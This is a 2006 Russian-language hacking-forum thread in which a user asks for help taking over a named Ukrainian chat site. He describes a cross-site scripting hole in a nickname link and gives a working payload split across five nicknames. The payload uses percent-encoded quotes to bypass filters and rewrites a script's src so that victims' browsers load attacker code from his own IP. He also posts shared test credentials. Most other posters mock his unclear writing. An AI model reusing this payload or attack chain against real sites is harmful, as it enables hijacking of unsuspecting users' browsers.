Помогите доломать чат!!!!!!!!!!!!

Discussion in 'Песочница' started by faust45, 18 Apr 2006.

Thread Status:
Not open for further replies.
  1. faust45

    faust45 Member

    Joined:
    2 Mar 2006
    Messages:
    42
    Likes Received:
    7
    Reputations:
    -5
    Помогите пожалуйста ломануть чат
    http://www.chatinet.zp.ua по полной програме

    Я нашёл там одну XSS пробоину Но уж больно
    непросто заманить юзера

    Вкратце опишу дыру может Кому интерестно будет
    Есле залогинетесь под поролем Rendom то после того как вы напишете комуто сообщение в броузере появится такой код
    .........<a href="Javascript: parent.send.WritePage('52656E646F6D','Rendom')"><font color="#006688"><b>Rendom</b>...............</a>


    Ловите фишку ник передаётся как параметр в фунцию всёбы не чего НО всё ето происходит в
    hrefe а ето значит что опасные знаки типа ' " можна прописывать в %27 и %22 обходя все фильтры
    Теперь введя ник %27,alert(),%27 (%27 значит ')
    получим:
    ....<a href="Javascript: parent.send.WritePage('52656E646F6D','%27,alert(),%27')"><font color="#006688"><b>%27,alert(),%27</b>
    ...............</a>

    И при клике по нашему нику выполнится код между запятыми !!!!!!! УРА!!!!!!!!
    Используя Apach и детскую наивность чатлан мне удалось закачать Script к ним в броузер и захватить полный кантроль Всё бы то ничего но для того чтобы закачать Script нужно заставить одного юзера нажать на пять карявых ников Что не всегда удается


    Может поможите ломануть по полной програме
    чтоб послал сообщение и всё и чтоб не упрашивать юзера кликать пять раз по карявым никам

    Ну очень надо !!!!!!!!!
    Зарание блогаларен.
     
  2. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    ничерта не понял. то под паролем Рандом логиниться надо, то ник передается.
    А Апач зачем?

    Регься липовой регистрацией и оставь данные для входа. Народ посмотрит сам.
     
    _________________________
  3. faust45

    faust45 Member

    Joined:
    2 Mar 2006
    Messages:
    42
    Likes Received:
    7
    Reputations:
    -5
    Под Rendom надо понимать любой ник
    А Apach для того чтобы залить свой Script к чатлану ну тоесь у кокого нибудь скрипта
    изменить значение атрибута SRC="мой IP"
    Я же писал что вся загвоздка состоит в том чтобы заставить юзера последовательно кликнуть на пять вычурных ников Тем самым в его броузере выполнится код в результате у какого нибудь Scripta изменится атрибуд SRC на мой IP !
     
  4. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    Все равно не понял.
    Ну выйдешь ты за пределы ником типа 123', но толку то? Работает фильтр, длинное обрезается. Как ты путь (scr) скрипту свой прописал? Нафиг Апач?
     
    _________________________
  5. Антошка2003

    Антошка2003 Elder - Старейшина

    Joined:
    3 Apr 2005
    Messages:
    534
    Likes Received:
    66
    Reputations:
    49
    я тоже так и не пойму о чём автор говорит.
     
  6. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    Автор, лучше бы ты писал больше запятых, чем воскл. знаков.. Прочитать +понять смысл НЕРЕАЛЬНО

    По-русски все опиши, особенно вот этот момент:
    ...
     
  7. faust45

    faust45 Member

    Joined:
    2 Mar 2006
    Messages:
    42
    Likes Received:
    7
    Reputations:
    -5
    Ребята ну надоже хоть немного мозгами пораскинуть
    ну что вы хотите чтоб я всё разжевал ???
     
  8. faust45

    faust45 Member

    Joined:
    2 Mar 2006
    Messages:
    42
    Likes Received:
    7
    Reputations:
    -5
    Отвечаю на вопросы censored!

    Да фильтр режет ник Но.............
    поетому нужно разбить весь код по изменению SRC на пять ников
    d=document
    s=d.scripts[0]
    p="http:\\"
    p=p+"my_IP"
    s.src=p
    User Последовательно кликая по никам выполнит код .
    А ники корявые потаму что там полавину символов заминить на %коды надо.
    Ну а если ты ешё не понял зачем Apach то мой тебе совет Выпей Яду!
     
  9. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    Автор гонит не по-детски и, по-моему, не особо шарит по теме - видимо кто-то ему что-то сказал про сайт, а он это со слов записать попытался.
     
  10. faust45

    faust45 Member

    Joined:
    2 Mar 2006
    Messages:
    42
    Likes Received:
    7
    Reputations:
    -5
    Блин народ ну что ещё не понятного????
    Спрашуйте...............
     
  11. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Поцан ыт не реально настиигал. Как у тебя Xss работает не помняно =))
     
    1 person likes this.
  12. Go0o$E

    Go0o$E Members of Antichat

    Joined:
    27 Jan 2006
    Messages:
    304
    Likes Received:
    228
    Reputations:
    419
    Надо статью сделать "Русский язык для хакера". Какие там Xss, Sql и т.д. Русский надо знать сначала. Хотя бы чтобы тебя понимали.
     
    1 person likes this.
  13. faust45

    faust45 Member

    Joined:
    2 Mar 2006
    Messages:
    42
    Likes Received:
    7
    Reputations:
    -5
    Читайте пожалуйста вдумчиво!!!!!!!!

    Заходим под пятью никами:

    1) %27,d%3Ddocument,%27
    2) %27,s%3Dd.scripts[0],%27 <--! Прошу обратить внемание, mах длина Логина 24 символа всё что после режется фильтром. Вот свезло так свизло Символ в символ -->
    3) %27,p%3D"http://",%27
    4) %27,p%3Dp+%27my_IP
    5) %27,s.src%3Dp,%27 <--! После клика по етому нику Броузер обратится к моему компу на 80 порт по HTTP(чтобы подкачать скрипт) А там Apach висит, а в файле index.html записан Script Захватывающий контроль над броузером -->

    %27 значит ' <--! Обход фильтров -->
    %3D значит =

    Затем упрашиваем Чатлана попорядку кликнуть по никам и ............

    Если у когото будет желани проверить Логиньтесь под етими никами только неполитесь и в Главную комнату не суйтесь Пароль на все ники 123
    Затем просто наведите мыш на ник и посмотрите в строку состояния броузера.


    Ну вроде всё расписал подробно !!!
    Ёщё будут вопросы???
     
  14. faust45

    faust45 Member

    Joined:
    2 Mar 2006
    Messages:
    42
    Likes Received:
    7
    Reputations:
    -5
    Да и помогать до ламывать не надо Забудьте я пошутил.
     
  15. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    Как ты себе это представляешь? Слушай! сними видео о том, как зайти под пятью никами...
     
  16. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    faust45, теоретически понятно как ты хотел сделать, но на практике на том чате я не представляю.
    Так чего, тему закрывать?
     
    _________________________
  17. Антошка2003

    Антошка2003 Elder - Старейшина

    Joined:
    3 Apr 2005
    Messages:
    534
    Likes Received:
    66
    Reputations:
    49
    по видимому, да. не можем мы его допонять полностью.
     
  18. faust45

    faust45 Member

    Joined:
    2 Mar 2006
    Messages:
    42
    Likes Received:
    7
    Reputations:
    -5
    Слушай censored!
    Всё что я написал реально работает я всё ето проделывал лично.
    Я просто думал , может на основе етой дыры кто то ломанёт ещё круче .
    А никто неможет вьехать даже в расжованый XSS

    Да тему закрывай.
     
  19. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    ДА Я ЛАМЕР
     
  20. bxN5

    bxN5 Elder - Старейшина

    Joined:
    8 Jan 2006
    Messages:
    687
    Likes Received:
    138
    Reputations:
    32
    а почему ник у тя фиолетовый?
     
Thread Status:
Not open for further replies.